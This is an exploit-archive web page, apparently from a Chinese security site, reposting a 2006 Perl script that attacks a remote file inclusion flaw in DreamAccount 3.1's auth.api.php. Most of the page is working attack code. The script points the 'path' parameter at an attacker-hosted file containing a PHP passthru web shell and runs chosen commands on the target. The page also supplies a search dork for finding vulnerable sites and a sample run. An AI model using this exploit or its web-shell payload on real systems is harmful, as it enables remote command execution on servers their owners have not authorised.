首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
DreamAccount <= 3.1 (auth.api.php) Remote File Include Exploit
来源:http://dreamcost.com 作者:Drago84 发布时间:2006-06-27  

#!/usr/bin/perl
use HTTP::Request;
use LWP::UserAgent;
# ----------------------------------------------------
# DREAMACCOUNT V3.1 Remote Command Execution Exploit
# ----------------------------------------------------
# Discovered By CrAsh_oVeR_rIdE(Arabian Security Team)
# Coded By Drago84(Exclusive Security Team)
# ----------------------------------------------------
# site of script:http://dreamcost.com
# ----------------------------------------------------
# Vulnerable: DREAMACCOUNT V3.1
# ----------------------------------------------------
# vulnerable file :
# ------------------
# auth.api.php
# ----------------------------------------------------
# vulnerable code:
# ----------------------------------------------------
# require_once($path . 'mod_htaccess.inc.php'); // 0
# require_once($path . 'mod_pmachine.inc.php'); // 4
# require_once($path . 'mod_vbulletin.inc.php'); // 5
# require_once($path . 'mod_phpbb.inc.php'); // 6
# require_once($path . 'mod_postnuke.inc.php'); // 7
# require_once($path . 'mod_phpnuke.inc.php'); // 8
# require_once($path . 'mod_freeradius.inc.php'); // 9
# require_once($path . 'mod_ldap.inc.php'); // 10
# require_once($path . 'mod_invboard.inc.php'); // 11
# require_once($path . 'mod_yabbse.inc.php'); // 12
# require_once($path . 'mod_mambo.inc.php'); // 13
# require_once($path . 'mod_xaraya.inc.php'); // 14
# require_once($path . 'mod_geeklog.inc.php'); // 15
#
# $path parameter File inclusion
# ----------------------------------------------------
# Exploit:
# ---------
print "\n=============================================================================\r\n";
print " * Dreamaccount Remote Command Execution 23/06/06 *\r\n";
print "=============================================================================\r\n";
print "[*] dork:\"powered by DreamAccount 3.1\"\n";
print "[*] Coded By : Drago84 \n";
print "[*] Discovered by CrAsH_oVeR_rIdE\n";
print "[*] Use <site> <dir_Dream> <eval site> <cmd>\n";
print " Into the Eval Site it must be:\n\n";
print " Exclusive <?php passthru($_GET[cmd]); ?> /Exclusive";

if (@ARGV < 4)
{
print "\n\n[*] usage: perl dream.pl <site> <dir dream> <eval site> <cmd>\n";
print "[*] usage: perl dream.pl www.HosT.com /dreamaccount/ http://www.site.org/doc.jpg id\n";
print "[*] uid=90(nobody) gid=90(nobody) egid=90(nobody) \n";
exit();
}
my $dir=$ARGV[1];
my $host=$ARGV[0];
my $eval=$ARGV[2];
my $cmd=$ARGV[3];
my $url2=$host.$dir."auth.api.php?path=".$eval."?&cmd=".$cmd;
print "\n";
my $req=HTTP::Request->new(GET=>$url2);
my $ua=LWP::UserAgent->new();
$ua->timeout(10);
my $response=$ua->request($req);
if ($response->is_success) {
print "\n\nResult of:".$cmd."\n";
my ($pezzo_utile) = ( $response->content =~ m{Exclusive(.+)\/Exclusive}smx );
printf $1;
$response->content;
print "\n";

}

# ----------------------------------------------------------------------------------------------------
# Discovered By CrAsh_oVeR_rIdE
# Coded By Drago84
# E-mail:KARKOR23@hotmail.com
# Site:www.lezr.com
# Greetz:KING-HACKER,YOUNG_HACKER,SIMO,ROOT-HACKED,SAUDI,QPTAN,POWERWALL,SNIPER_SA,Black-Code,ALMOKAN3,Mr.hcR AND ALL LEZR.COM Member




 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·DeluxeBB <= 1.07 (cp.php) C
·NIPrint LPD Request Overflow
·MyBulletinBoard (MyBB) <= 1
·Cesar FTP 0.99g MKD Command Bu
·XM Easy Personal FTP Server 5.
·Microsoft RRAS MSO6-025 Stack
·BitchX <= 1.1-final do_hook
·Scout Portal Toolkit <= 1.4
·Jaws <= 0.6.2 (Search gadge
·Microsoft Excel 2003 Hlink Sta
·DataLife Engine <= 4.1 Remo
·BLOG:CMS <= 4.0.0k Remote S
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved